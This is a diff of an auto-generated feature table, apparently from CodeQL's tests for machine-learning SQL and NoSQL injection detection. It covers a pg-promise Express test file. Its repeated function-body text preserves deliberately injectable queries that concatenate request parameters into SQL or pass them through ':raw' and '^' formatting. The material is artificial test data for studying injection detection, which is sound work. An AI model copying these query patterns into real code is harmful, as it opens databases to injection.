name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | exceptional return of db.one( ... ]\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | exceptional return of db.one( ... ]\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | exceptional return of db.one( ... ]\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | exceptional return of db.one( ... ]\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | exceptional return of db.one( ... ]\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:6:36:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:6:36:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:6:36:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:6:36:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:6:36:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:10:43:3 | {\\n t ... ]\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:10:43:3 | {\\n t ... ]\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:10:43:3 | {\\n t ... ]\\n } | calleeImports | pg-promise | @@ -3715,6 +18229,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:10:43:3 | {\\n t ... ]\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:10:43:3 | {\\n t ... ]\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:10:43:3 | {\\n t ... ]\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:8 | text | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:8 | text | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:8 | text | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:8 | text | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:5:37:79 | text: ' ... o = $3' | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:11:37:79 | 'SELECT ... o = $3' | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:11:37:79 | 'SELECT ... o = $3' | InputAccessPathFromCallee | 0.text | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:11:37:79 | 'SELECT ... o = $3' | InputArgumentIndex | 0 | @@ -3725,6 +18254,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:11:37:79 | 'SELECT ... o = $3' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:11:37:79 | 'SELECT ... o = $3' | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:37:11:37:79 | 'SELECT ... o = $3' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:38:10 | values | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:38:10 | values | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:38:10 | values | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:38:10 | values | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:38:10 | values | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:5:42:5 | values: ... n\\n ] | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | InputAccessPathFromCallee | 0.values | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | InputArgumentIndex | 0 | @@ -3735,21 +18279,121 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:9 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:9 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:9 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:9 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:9 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:16 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:16 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:16 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:16 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:16 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:7:39:19 | req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:11:39:16 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:11:39:16 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:11:39:16 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:11:39:16 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:11:39:16 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:18:39:19 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:18:39:19 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:18:39:19 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:18:39:19 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:39:18:39:19 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:9 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:9 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:9 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:9 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:9 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:16 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:16 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:16 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:16 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:16 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:7:40:21 | req.params.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:40:11:40:16 | params | 